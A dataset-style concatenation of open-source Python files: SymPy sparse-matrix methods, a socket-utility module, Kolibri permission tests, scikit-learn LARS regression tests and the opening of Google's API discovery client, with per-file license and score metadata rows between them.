def col_swap(self, i, j):
"""Swap, in place, columns i and j.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> S = SparseMatrix.eye(3); S[2, 1] = 2
>>> S.col_swap(1, 0); S
Matrix([
[0, 1, 0],
[1, 0, 0],
[2, 0, 1]])
"""
if i > j:
i, j = j, i
rows = self.col_list()
temp = []
for ii, jj, v in rows:
if jj == i:
self._smat.pop((ii, jj))
temp.append((ii, v))
elif jj == j:
self._smat.pop((ii, jj))
self._smat[ii, i] = v
elif jj > j:
break
for k, v in temp:
self._smat[k, j] = v
def row_join(self, other):
"""Returns B appended after A (column-wise augmenting)::
[A B]
Examples
========
>>> from sympy import SparseMatrix, Matrix
>>> A = SparseMatrix(((1, 0, 1), (0, 1, 0), (1, 1, 0)))
>>> A
Matrix([
[1, 0, 1],
[0, 1, 0],
[1, 1, 0]])
>>> B = SparseMatrix(((1, 0, 0), (0, 1, 0), (0, 0, 1)))
>>> B
Matrix([
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
>>> C = A.row_join(B); C
Matrix([
[1, 0, 1, 1, 0, 0],
[0, 1, 0, 0, 1, 0],
[1, 1, 0, 0, 0, 1]])
>>> C == A.row_join(Matrix(B))
True
Joining at row ends is the same as appending columns at the end
of the matrix:
>>> C == A.col_insert(A.cols, B)
True
"""
A, B = self, other
if not A.rows == B.rows:
raise ShapeError()
A = A.copy()
if not isinstance(B, SparseMatrix):
k = 0
b = B._mat
for i in range(B.rows):
for j in range(B.cols):
v = b[k]
if v:
A._smat[(i, j + A.cols)] = v
k += 1
else:
for (i, j), v in B._smat.items():
A._smat[(i, j + A.cols)] = v
A.cols += B.cols
return A
def col_join(self, other):
"""Returns B augmented beneath A (row-wise joining)::
[A]
[B]
Examples
========
>>> from sympy import SparseMatrix, Matrix, ones
>>> A = SparseMatrix(ones(3))
>>> A
Matrix([
[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
>>> B = SparseMatrix.eye(3)
>>> B
Matrix([
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
>>> C = A.col_join(B); C
Matrix([
[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
>>> C == A.col_join(Matrix(B))
True
Joining along columns is the same as appending rows at the end
of the matrix:
>>> C == A.row_insert(A.rows, Matrix(B))
True
"""
A, B = self, other
if not A.cols == B.cols:
raise ShapeError()
A = A.copy()
if not isinstance(B, SparseMatrix):
k = 0
b = B._mat
for i in range(B.rows):
for j in range(B.cols):
v = b[k]
if v:
A._smat[(i + A.rows, j)] = v
k += 1
else:
for (i, j), v in B._smat.items():
A._smat[i + A.rows, j] = v
A.rows += B.rows
return A
def copyin_list(self, key, value):
if not is_sequence(value):
raise TypeError("`value` must be of type list or tuple.")
self.copyin_matrix(key, Matrix(value))
def copyin_matrix(self, key, value):
# include this here because it's not part of BaseMatrix
rlo, rhi, clo, chi = self.key2bounds(key)
shape = value.shape
dr, dc = rhi - rlo, chi - clo
if shape != (dr, dc):
raise ShapeError(
"The Matrix `value` doesn't have the same dimensions "
"as the in sub-Matrix given by `key`.")
if not isinstance(value, SparseMatrix):
for i in range(value.rows):
for j in range(value.cols):
self[i + rlo, j + clo] = value[i, j]
else:
if (rhi - rlo)*(chi - clo) < len(self):
for i in range(rlo, rhi):
for j in range(clo, chi):
self._smat.pop((i, j), None)
else:
for i, j, v in self.row_list():
if rlo <= i < rhi and clo <= j < chi:
self._smat.pop((i, j), None)
for k, v in value._smat.items():
i, j = k
self[i + rlo, j + clo] = value[i, j]
def zip_row_op(self, i, k, f):
"""In-place operation on row ``i`` using two-arg functor whose args are
interpreted as ``(self[i, j], self[k, j])``.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> M = SparseMatrix.eye(3)*2
>>> M[0, 1] = -1
>>> M.zip_row_op(1, 0, lambda v, u: v + 2*u); M
Matrix([
[2, -1, 0],
[4, 0, 0],
[0, 0, 2]])
See Also
========
row
row_op
col_op
"""
self.row_op(i, lambda v, j: f(v, self[k, j]))
def row_op(self, i, f):
"""In-place operation on row ``i`` using two-arg functor whose args are
interpreted as ``(self[i, j], j)``.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> M = SparseMatrix.eye(3)*2
>>> M[0, 1] = -1
>>> M.row_op(1, lambda v, j: v + 2*M[0, j]); M
Matrix([
[2, -1, 0],
[4, 0, 0],
[0, 0, 2]])
See Also
========
row
zip_row_op
col_op
"""
for j in range(self.cols):
v = self._smat.get((i, j), S.Zero)
fv = f(v, j)
if fv:
self._smat[(i, j)] = fv
elif v:
self._smat.pop((i, j))
def col_op(self, j, f):
"""In-place operation on col j using two-arg functor whose args are
interpreted as (self[i, j], i) for i in range(self.rows).
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> M = SparseMatrix.eye(3)*2
>>> M[1, 0] = -1
>>> M.col_op(1, lambda v, i: v + 2*M[i, 0]); M
Matrix([
[ 2, 4, 0],
[-1, 0, 0],
[ 0, 0, 2]])
"""
for i in range(self.rows):
v = self._smat.get((i, j), S.Zero)
fv = f(v, i)
if fv:
self._smat[(i, j)] = fv
elif v:
self._smat.pop((i, j))
def fill(self, value):
"""Fill self with the given value.
Notes
=====
Unless many values are going to be deleted (i.e. set to zero)
this will create a matrix that is slower than a dense matrix in
operations.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> M = SparseMatrix.zeros(3); M
Matrix([
[0, 0, 0],
[0, 0, 0],
[0, 0, 0]])
>>> M.fill(1); M
Matrix([
[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
"""
if not value:
self._smat = {}
else:
v = self._sympify(value)
self._smat = dict([((i, j), v)
for i in range(self.rows) for j in range(self.cols)])
| bsd-3-clause | -4,068,299,058,737,986,000 | 27.363873 | 112 | 0.439613 | false |
aarmea/McMillen12Step-bitwig | client/sockutil.py | 1 | 5038 | """Various low-level utility functions for sockets.
Modified from https://github.com/markokr/skytools/blob/018d85b644f24cadef344e562aded22fee14d036/python/skytools/sockutil.py
Original license
================
SkyTools - tool collection for PostgreSQL
Copyright (c) 2007 Marko Kreen, Skype Technologies
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
__all__ = ['set_tcp_keepalive', 'set_nonblocking', 'set_cloexec']
import sys
import os
import socket
try:
import fcntl
except ImportError:
pass
__all__ = ['set_tcp_keepalive', 'set_nonblocking', 'set_cloexec']
def set_tcp_keepalive(fd, keepalive = True,
tcp_keepidle = 4 * 60,
tcp_keepcnt = 4,
tcp_keepintvl = 15):
"""Turn on TCP keepalive. The fd can be either numeric or socket
object with 'fileno' method.
OS defaults for SO_KEEPALIVE=1:
- Linux: (7200, 9, 75) - can configure all.
- MacOS: (7200, 8, 75) - can configure only tcp_keepidle.
- Win32: (7200, 5|10, 1) - can configure tcp_keepidle and tcp_keepintvl.
Our defaults: (240, 4, 15).
>>> import socket
>>> s = socket.socket()
>>> set_tcp_keepalive(s)
"""
# usable on this OS?
if not hasattr(socket, 'SO_KEEPALIVE'):
return
# need socket object
if isinstance(fd, socket.SocketType):
s = fd
elif hasattr(socket, 'fromfd'):
if hasattr(fd, 'fileno'):
fd = fd.fileno()
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
else:
return
# skip if unix socket
if type(s.getsockname()) != type(()):
return
# no keepalive?
if not keepalive:
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
return
# basic keepalive
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# detect available options
TCP_KEEPCNT = getattr(socket, 'TCP_KEEPCNT', None)
TCP_KEEPINTVL = getattr(socket, 'TCP_KEEPINTVL', None)
TCP_KEEPIDLE = getattr(socket, 'TCP_KEEPIDLE', None)
TCP_KEEPALIVE = getattr(socket, 'TCP_KEEPALIVE', None)
SIO_KEEPALIVE_VALS = getattr(socket, 'SIO_KEEPALIVE_VALS', None)
if TCP_KEEPIDLE is None and TCP_KEEPALIVE is None and sys.platform == 'darwin':
TCP_KEEPALIVE = 0x10
# configure
if TCP_KEEPCNT is not None:
s.setsockopt(socket.IPPROTO_TCP, TCP_KEEPCNT, tcp_keepcnt)
if TCP_KEEPINTVL is not None:
s.setsockopt(socket.IPPROTO_TCP, TCP_KEEPINTVL, tcp_keepintvl)
if TCP_KEEPIDLE is not None:
s.setsockopt(socket.IPPROTO_TCP, TCP_KEEPIDLE, tcp_keepidle)
elif TCP_KEEPALIVE is not None:
s.setsockopt(socket.IPPROTO_TCP, TCP_KEEPALIVE, tcp_keepidle)
elif SIO_KEEPALIVE_VALS is not None:
s.ioctl(SIO_KEEPALIVE_VALS, (1, tcp_keepidle*1000, tcp_keepintvl*1000))
def set_nonblocking(fd, onoff=True):
"""Toggle the O_NONBLOCK flag.
If onoff==None then return current setting.
Actual sockets from 'socket' module should use .setblocking() method,
this is for situations where it is not available. Eg. pipes
from 'subprocess' module.
>>> import socket
>>> s = socket.socket()
>>> set_nonblocking(s, None)
False
>>> set_nonblocking(s, 1)
>>> set_nonblocking(s, None)
True
"""
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
if onoff is None:
return (flags & os.O_NONBLOCK) > 0
if onoff:
flags |= os.O_NONBLOCK
else:
flags &= ~os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
def set_cloexec(fd, onoff=True):
"""Toggle the FD_CLOEXEC flag.
If onoff==None then return current setting.
Some libraries do it automatically (eg. libpq).
Others do not (Python stdlib).
>>> import os
>>> f = open(os.devnull, 'rb')
>>> set_cloexec(f, None)
False
>>> set_cloexec(f, True)
>>> set_cloexec(f, None)
True
>>> import socket
>>> s = socket.socket()
>>> set_cloexec(s, None)
False
>>> set_cloexec(s)
>>> set_cloexec(s, None)
True
"""
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
if onoff is None:
return (flags & fcntl.FD_CLOEXEC) > 0
if onoff:
flags |= fcntl.FD_CLOEXEC
else:
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
if __name__ == '__main__':
import doctest
doctest.testmod()
| mit | -6,819,269,375,270,745,000 | 28.988095 | 123 | 0.64867 | false |
benjaoming/kolibri | kolibri/auth/test/test_permissions_classes.py | 3 | 5747 | from __future__ import absolute_import, print_function, unicode_literals
from django.test import TestCase
from mock import Mock
from .helpers import create_superuser
from ..models import FacilityUser, Facility, KolibriAnonymousUser
from ..api import KolibriAuthPermissions
from ..permissions.base import BasePermissions
from ..permissions.general import AllowAll, DenyAll
class BasePermissionsThrowExceptionsTestCase(TestCase):
def setUp(self):
self.facility = Facility.objects.create()
self.object = object() # shouldn't matter what the object is, for these tests
self.facility_user = FacilityUser.objects.create(username="qqq", facility=self.facility)
self.superuser = create_superuser(self.facility)
self.anon_user = KolibriAnonymousUser()
self.permissions = BasePermissions()
def test_user_cannot_create(self):
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_create_object(self.facility_user, self.object))
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_create_object(self.superuser, self.object))
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_create_object(self.anon_user, self.object))
def test_user_cannot_read(self):
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_read_object(self.facility_user, self.object))
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_read_object(self.superuser, self.object))
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_read_object(self.anon_user, self.object))
def test_user_cannot_update(self):
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_update_object(self.facility_user, self.object))
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_update_object(self.superuser, self.object))
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_update_object(self.anon_user, self.object))
def test_user_cannot_delete(self):
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_delete_object(self.facility_user, self.object))
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_delete_object(self.superuser, self.object))
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_delete_object(self.anon_user, self.object))
class TestBooleanOperationsOnPermissionClassesTestCase(TestCase):
def setUp(self):
self.facility = Facility.objects.create()
self.obj = object()
self.user = FacilityUser.objects.create(username='dummyuser', facility=self.facility)
self.queryset = FacilityUser.objects.all()
def assertAllowAll(self, perms, test_filtering=True):
self.assertTrue(perms.user_can_create_object(self.user, self.obj))
self.assertTrue(perms.user_can_read_object(self.user, self.obj))
self.assertTrue(perms.user_can_update_object(self.user, self.obj))
self.assertTrue(perms.user_can_delete_object(self.user, self.obj))
if test_filtering:
self.assertSetEqual(set(self.queryset), set(perms.readable_by_user_filter(self.user, self.queryset)))
def assertDenyAll(self, perms, test_filtering=True):
self.assertFalse(perms.user_can_create_object(self.user, self.obj))
self.assertFalse(perms.user_can_read_object(self.user, self.obj))
self.assertFalse(perms.user_can_update_object(self.user, self.obj))
self.assertFalse(perms.user_can_delete_object(self.user, self.obj))
if test_filtering:
self.assertEqual(len(perms.readable_by_user_filter(self.user, self.queryset)), 0)
def test_allow_or_allow(self):
self.assertAllowAll(AllowAll() | AllowAll())
def test_allow_or_deny(self):
self.assertAllowAll(AllowAll() | DenyAll())
def test_deny_or_allow(self):
self.assertAllowAll(DenyAll() | AllowAll())
def test_deny_or_deny(self):
self.assertDenyAll(DenyAll() | DenyAll())
def test_allow_and_allow(self):
self.assertAllowAll(AllowAll() & AllowAll())
def test_allow_and_deny(self):
self.assertDenyAll(AllowAll() & DenyAll())
def test_deny_and_allow(self):
self.assertDenyAll(DenyAll() & AllowAll())
def test_deny_and_deny(self):
self.assertDenyAll(DenyAll() & DenyAll())
def test_or_is_shortcircuited_for_efficiency(self):
self.assertAllowAll(AllowAll() | BasePermissions(), test_filtering=False)
def test_and_is_shortcircuited_for_efficiency(self):
self.assertDenyAll(DenyAll() & BasePermissions(), test_filtering=False)
def test_or_is_not_shortcircuited_inappropriately(self):
with self.assertRaises(NotImplementedError):
self.assertAllowAll(BasePermissions() | AllowAll())
def test_and_is_not_shortcircuited_inappropriately(self):
with self.assertRaises(NotImplementedError):
self.assertDenyAll(BasePermissions() & DenyAll())
class KolibriAuthPermissionsTestCase(TestCase):
def test_bad_request_method(self):
request = Mock(method="BADWOLF")
view = Mock()
obj = Mock()
perm_obj = KolibriAuthPermissions()
self.assertFalse(perm_obj.has_object_permission(request, view, obj))
| mit | -4,047,654,272,939,319,300 | 44.611111 | 113 | 0.708544 | false |
mehdidc/scikit-learn | sklearn/linear_model/tests/test_least_angle.py | 11 | 16102 | from nose.tools import assert_equal
import numpy as np
from scipy import linalg
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import ignore_warnings, assert_warns_message
from sklearn.utils.testing import assert_no_warnings, assert_warns
from sklearn.utils import ConvergenceWarning
from sklearn import linear_model, datasets
diabetes = datasets.load_diabetes()
X, y = diabetes.data, diabetes.target
# TODO: use another dataset that has multiple drops
def test_simple():
"""
Principle of Lars is to keep covariances tied and decreasing
"""
# also test verbose output
from sklearn.externals.six.moves import cStringIO as StringIO
import sys
old_stdout = sys.stdout
try:
sys.stdout = StringIO()
alphas_, active, coef_path_ = linear_model.lars_path(
diabetes.data, diabetes.target, method="lar", verbose=10)
sys.stdout = old_stdout
for (i, coef_) in enumerate(coef_path_.T):
res = y - np.dot(X, coef_)
cov = np.dot(X.T, res)
C = np.max(abs(cov))
eps = 1e-3
ocur = len(cov[C - eps < abs(cov)])
if i < X.shape[1]:
assert_true(ocur == i + 1)
else:
# no more than max_pred variables can go into the active set
assert_true(ocur == X.shape[1])
finally:
sys.stdout = old_stdout
def test_simple_precomputed():
"""
The same, with precomputed Gram matrix
"""
G = np.dot(diabetes.data.T, diabetes.data)
alphas_, active, coef_path_ = linear_model.lars_path(
diabetes.data, diabetes.target, Gram=G, method="lar")
for i, coef_ in enumerate(coef_path_.T):
res = y - np.dot(X, coef_)
cov = np.dot(X.T, res)
C = np.max(abs(cov))
eps = 1e-3
ocur = len(cov[C - eps < abs(cov)])
if i < X.shape[1]:
assert_true(ocur == i + 1)
else:
# no more than max_pred variables can go into the active set
assert_true(ocur == X.shape[1])
def test_all_precomputed():
"""
Test that lars_path with precomputed Gram and Xy gives the right answer
"""
X, y = diabetes.data, diabetes.target
G = np.dot(X.T, X)
Xy = np.dot(X.T, y)
for method in 'lar', 'lasso':
output = linear_model.lars_path(X, y, method=method)
output_pre = linear_model.lars_path(X, y, Gram=G, Xy=Xy, method=method)
for expected, got in zip(output, output_pre):
assert_array_almost_equal(expected, got)
def test_lars_lstsq():
"""
Test that Lars gives least square solution at the end
of the path
"""
X1 = 3 * diabetes.data # use un-normalized dataset
clf = linear_model.LassoLars(alpha=0.)
clf.fit(X1, y)
coef_lstsq = np.linalg.lstsq(X1, y)[0]
assert_array_almost_equal(clf.coef_, coef_lstsq)
def test_lasso_gives_lstsq_solution():
"""
Test that Lars Lasso gives least square solution at the end
of the path
"""
alphas_, active, coef_path_ = linear_model.lars_path(X, y, method="lasso")
coef_lstsq = np.linalg.lstsq(X, y)[0]
assert_array_almost_equal(coef_lstsq, coef_path_[:, -1])
def test_collinearity():
"""Check that lars_path is robust to collinearity in input"""
X = np.array([[3., 3., 1.],
[2., 2., 0.],
[1., 1., 0]])
y = np.array([1., 0., 0])
f = ignore_warnings
_, _, coef_path_ = f(linear_model.lars_path)(X, y, alpha_min=0.01)
assert_true(not np.isnan(coef_path_).any())
residual = np.dot(X, coef_path_[:, -1]) - y
assert_less((residual ** 2).sum(), 1.) # just make sure it's bounded
n_samples = 10
X = np.random.rand(n_samples, 5)
y = np.zeros(n_samples)
_, _, coef_path_ = linear_model.lars_path(X, y, Gram='auto', copy_X=False,
copy_Gram=False, alpha_min=0.,
method='lasso', verbose=0,
max_iter=500)
assert_array_almost_equal(coef_path_, np.zeros_like(coef_path_))
def test_no_path():
"""
Test that the ``return_path=False`` option returns the correct output
"""
alphas_, active_, coef_path_ = linear_model.lars_path(
diabetes.data, diabetes.target, method="lar")
alpha_, active, coef = linear_model.lars_path(
diabetes.data, diabetes.target, method="lar", return_path=False)
assert_array_almost_equal(coef, coef_path_[:, -1])
assert_true(alpha_ == alphas_[-1])
def test_no_path_precomputed():
"""
Test that the ``return_path=False`` option with Gram remains correct
"""
G = np.dot(diabetes.data.T, diabetes.data)
alphas_, active_, coef_path_ = linear_model.lars_path(
diabetes.data, diabetes.target, method="lar", Gram=G)
alpha_, active, coef = linear_model.lars_path(
diabetes.data, diabetes.target, method="lar", Gram=G,
return_path=False)
assert_array_almost_equal(coef, coef_path_[:, -1])
assert_true(alpha_ == alphas_[-1])
def test_no_path_all_precomputed():
"""
Test that the ``return_path=False`` option with Gram and Xy remains correct
"""
X, y = 3 * diabetes.data, diabetes.target
G = np.dot(X.T, X)
Xy = np.dot(X.T, y)
alphas_, active_, coef_path_ = linear_model.lars_path(
X, y, method="lasso", Gram=G, Xy=Xy, alpha_min=0.9)
print("---")
alpha_, active, coef = linear_model.lars_path(
X, y, method="lasso", Gram=G, Xy=Xy, alpha_min=0.9, return_path=False)
assert_array_almost_equal(coef, coef_path_[:, -1])
assert_true(alpha_ == alphas_[-1])
def test_singular_matrix():
# Test when input is a singular matrix
X1 = np.array([[1, 1.], [1., 1.]])
y1 = np.array([1, 1])
alphas, active, coef_path = linear_model.lars_path(X1, y1)
assert_array_almost_equal(coef_path.T, [[0, 0], [1, 0]])
def test_rank_deficient_design():
# consistency test that checks that LARS Lasso is handling rank
# deficient input data (with n_features < rank) in the same way
# as coordinate descent Lasso
y = [5, 0, 5]
for X in ([[5, 0],
[0, 5],
[10, 10]],
[[10, 10, 0],
[1e-32, 0, 0],
[0, 0, 1]],
):
# To be able to use the coefs to compute the objective function,
# we need to turn off normalization
lars = linear_model.LassoLars(.1, normalize=False)
coef_lars_ = lars.fit(X, y).coef_
obj_lars = (1. / (2. * 3.)
* linalg.norm(y - np.dot(X, coef_lars_)) ** 2
+ .1 * linalg.norm(coef_lars_, 1))
coord_descent = linear_model.Lasso(.1, tol=1e-6, normalize=False)
coef_cd_ = coord_descent.fit(X, y).coef_
obj_cd = ((1. / (2. * 3.)) * linalg.norm(y - np.dot(X, coef_cd_)) ** 2
+ .1 * linalg.norm(coef_cd_, 1))
assert_less(obj_lars, obj_cd * (1. + 1e-8))
def test_lasso_lars_vs_lasso_cd(verbose=False):
"""
Test that LassoLars and Lasso using coordinate descent give the
same results.
"""
X = 3 * diabetes.data
alphas, _, lasso_path = linear_model.lars_path(X, y, method='lasso')
lasso_cd = linear_model.Lasso(fit_intercept=False, tol=1e-8)
for c, a in zip(lasso_path.T, alphas):
if a == 0:
continue
lasso_cd.alpha = a
lasso_cd.fit(X, y)
error = linalg.norm(c - lasso_cd.coef_)
assert_less(error, 0.01)
# similar test, with the classifiers
for alpha in np.linspace(1e-2, 1 - 1e-2, 20):
clf1 = linear_model.LassoLars(alpha=alpha, normalize=False).fit(X, y)
clf2 = linear_model.Lasso(alpha=alpha, tol=1e-8,
normalize=False).fit(X, y)
err = linalg.norm(clf1.coef_ - clf2.coef_)
assert_less(err, 1e-3)
# same test, with normalized data
X = diabetes.data
alphas, _, lasso_path = linear_model.lars_path(X, y, method='lasso')
lasso_cd = linear_model.Lasso(fit_intercept=False, normalize=True,
tol=1e-8)
for c, a in zip(lasso_path.T, alphas):
if a == 0:
continue
lasso_cd.alpha = a
lasso_cd.fit(X, y)
error = linalg.norm(c - lasso_cd.coef_)
assert_less(error, 0.01)
def test_lasso_lars_vs_lasso_cd_early_stopping(verbose=False):
"""
Test that LassoLars and Lasso using coordinate descent give the
same results when early stopping is used.
(test : before, in the middle, and in the last part of the path)
"""
alphas_min = [10, 0.9, 1e-4]
for alphas_min in alphas_min:
alphas, _, lasso_path = linear_model.lars_path(X, y, method='lasso',
alpha_min=0.9)
lasso_cd = linear_model.Lasso(fit_intercept=False, tol=1e-8)
lasso_cd.alpha = alphas[-1]
lasso_cd.fit(X, y)
error = linalg.norm(lasso_path[:, -1] - lasso_cd.coef_)
assert_less(error, 0.01)
alphas_min = [10, 0.9, 1e-4]
# same test, with normalization
for alphas_min in alphas_min:
alphas, _, lasso_path = linear_model.lars_path(X, y, method='lasso',
alpha_min=0.9)
lasso_cd = linear_model.Lasso(fit_intercept=True, normalize=True,
tol=1e-8)
lasso_cd.alpha = alphas[-1]
lasso_cd.fit(X, y)
error = linalg.norm(lasso_path[:, -1] - lasso_cd.coef_)
assert_less(error, 0.01)
def test_lasso_lars_path_length():
# Test that the path length of the LassoLars is right
lasso = linear_model.LassoLars()
lasso.fit(X, y)
lasso2 = linear_model.LassoLars(alpha=lasso.alphas_[2])
lasso2.fit(X, y)
assert_array_almost_equal(lasso.alphas_[:3], lasso2.alphas_)
# Also check that the sequence of alphas is always decreasing
assert_true(np.all(np.diff(lasso.alphas_) < 0))
def test_lasso_lars_vs_lasso_cd_ill_conditioned():
# Test lasso lars on a very ill-conditioned design, and check that
# it does not blow up, and stays somewhat close to a solution given
# by the coordinate descent solver
# Also test that lasso_path (using lars_path output style) gives
# the same result as lars_path and previous lasso output style
# under these conditions.
rng = np.random.RandomState(42)
# Generate data
n, m = 70, 100
k = 5
X = rng.randn(n, m)
w = np.zeros((m, 1))
i = np.arange(0, m)
rng.shuffle(i)
supp = i[:k]
w[supp] = np.sign(rng.randn(k, 1)) * (rng.rand(k, 1) + 1)
y = np.dot(X, w)
sigma = 0.2
y += sigma * rng.rand(*y.shape)
y = y.squeeze()
lars_alphas, _, lars_coef = linear_model.lars_path(X, y, method='lasso')
_, lasso_coef2, _ = linear_model.lasso_path(X, y,
alphas=lars_alphas,
tol=1e-6,
fit_intercept=False)
assert_array_almost_equal(lars_coef, lasso_coef2, decimal=1)
def test_lasso_lars_vs_lasso_cd_ill_conditioned2():
# Create an ill-conditioned situation in which the LARS has to go
# far in the path to converge, and check that LARS and coordinate
# descent give the same answers
# Note it used to be the case that Lars had to use the drop for good
# strategy for this but this is no longer the case with the
# equality_tolerance checks
X = [[1e20, 1e20, 0],
[-1e-32, 0, 0],
[1, 1, 1]]
y = [10, 10, 1]
alpha = .0001
def objective_function(coef):
return (1. / (2. * len(X)) * linalg.norm(y - np.dot(X, coef)) ** 2
+ alpha * linalg.norm(coef, 1))
lars = linear_model.LassoLars(alpha=alpha, normalize=False)
assert_warns(ConvergenceWarning, lars.fit, X, y)
lars_coef_ = lars.coef_
lars_obj = objective_function(lars_coef_)
coord_descent = linear_model.Lasso(alpha=alpha, tol=1e-10, normalize=False)
cd_coef_ = coord_descent.fit(X, y).coef_
cd_obj = objective_function(cd_coef_)
assert_less(lars_obj, cd_obj * (1. + 1e-8))
def test_lars_add_features():
"""
assure that at least some features get added if necessary
test for 6d2b4c
"""
# Hilbert matrix
n = 5
H = 1. / (np.arange(1, n + 1) + np.arange(n)[:, np.newaxis])
clf = linear_model.Lars(fit_intercept=False).fit(
H, np.arange(n))
assert_true(np.all(np.isfinite(clf.coef_)))
def test_lars_n_nonzero_coefs(verbose=False):
lars = linear_model.Lars(n_nonzero_coefs=6, verbose=verbose)
lars.fit(X, y)
assert_equal(len(lars.coef_.nonzero()[0]), 6)
# The path should be of length 6 + 1 in a Lars going down to 6
# non-zero coefs
assert_equal(len(lars.alphas_), 7)
def test_multitarget():
"""
Assure that estimators receiving multidimensional y do the right thing
"""
X = diabetes.data
Y = np.vstack([diabetes.target, diabetes.target ** 2]).T
n_targets = Y.shape[1]
for estimator in (linear_model.LassoLars(), linear_model.Lars()):
estimator.fit(X, Y)
Y_pred = estimator.predict(X)
Y_dec = estimator.decision_function(X)
assert_array_almost_equal(Y_pred, Y_dec)
alphas, active, coef, path = (estimator.alphas_, estimator.active_,
estimator.coef_, estimator.coef_path_)
for k in range(n_targets):
estimator.fit(X, Y[:, k])
y_pred = estimator.predict(X)
assert_array_almost_equal(alphas[k], estimator.alphas_)
assert_array_almost_equal(active[k], estimator.active_)
assert_array_almost_equal(coef[k], estimator.coef_)
assert_array_almost_equal(path[k], estimator.coef_path_)
assert_array_almost_equal(Y_pred[:, k], y_pred)
def test_lars_cv():
""" Test the LassoLarsCV object by checking that the optimal alpha
increases as the number of samples increases.
This property is not actually garantied in general and is just a
property of the given dataset, with the given steps chosen.
"""
old_alpha = 0
lars_cv = linear_model.LassoLarsCV()
for length in (400, 200, 100):
X = diabetes.data[:length]
y = diabetes.target[:length]
lars_cv.fit(X, y)
np.testing.assert_array_less(old_alpha, lars_cv.alpha_)
old_alpha = lars_cv.alpha_
def test_lasso_lars_ic():
""" Test the LassoLarsIC object by checking that
- some good features are selected.
- alpha_bic > alpha_aic
- n_nonzero_bic < n_nonzero_aic
"""
lars_bic = linear_model.LassoLarsIC('bic')
lars_aic = linear_model.LassoLarsIC('aic')
rng = np.random.RandomState(42)
X = diabetes.data
y = diabetes.target
X = np.c_[X, rng.randn(X.shape[0], 4)] # add 4 bad features
lars_bic.fit(X, y)
lars_aic.fit(X, y)
nonzero_bic = np.where(lars_bic.coef_)[0]
nonzero_aic = np.where(lars_aic.coef_)[0]
assert_greater(lars_bic.alpha_, lars_aic.alpha_)
assert_less(len(nonzero_bic), len(nonzero_aic))
assert_less(np.max(nonzero_bic), diabetes.data.shape[1])
# test error on unknown IC
lars_broken = linear_model.LassoLarsIC('<unknown>')
assert_raises(ValueError, lars_broken.fit, X, y)
def test_no_warning_for_zero_mse():
"""LassoLarsIC should not warn for log of zero MSE."""
y = np.arange(10, dtype=float)
X = y.reshape(-1, 1)
lars = linear_model.LassoLarsIC(normalize=False)
assert_no_warnings(lars.fit, X, y)
assert_true(np.any(np.isinf(lars.criterion_)))
if __name__ == '__main__':
import nose
nose.runmodule()
| bsd-3-clause | 2,529,933,273,364,877,300 | 33.928416 | 79 | 0.589616 | false |
harshilasu/GraphicMelon | y/google-cloud-sdk/.install/.backup/lib/apiclient/discovery.py | 5 | 37418 | # Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Client for discovery based APIs.
A client library for Google's discovery based APIs.
"""
__all__ = [
'build',
'build_from_document',
'fix_method_name',
'key2param',
]
# Standard library imports
import StringIO
import copy
from email.generator import Generator
from email.mime.multipart import MIMEMultipart
from email.mime.nonmultipart import MIMENonMultipart
import json
import keyword
import logging
import mimetypes
import os
import re
import urllib
import urlparse
try:
from urlparse import parse_qsl
except ImportError:
